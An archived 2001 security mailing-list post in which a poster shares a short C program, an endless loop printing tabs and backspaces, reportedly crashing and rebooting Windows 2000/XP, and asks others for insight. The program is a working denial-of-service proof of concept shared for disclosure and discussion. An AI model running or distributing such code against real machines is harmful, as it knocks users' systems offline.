OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Teodor Cimpoesu (teogecadsoftware.com)
Date: Mon Oct 29 2001 - 09:19:47 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Some guys arround here are having fun with a little C program which causes
    Windows200/XP to reboot:

    #include <stdio.h>

    int main(void)
    {
       while (1)
          printf("\t\t\b\b\b\b\b\b");
       return 0;
    }

    I don't know exactly where it was first seen, and who discovered it; just
    thought to forward it here maybe others have insights.

    comments?

    -- teodor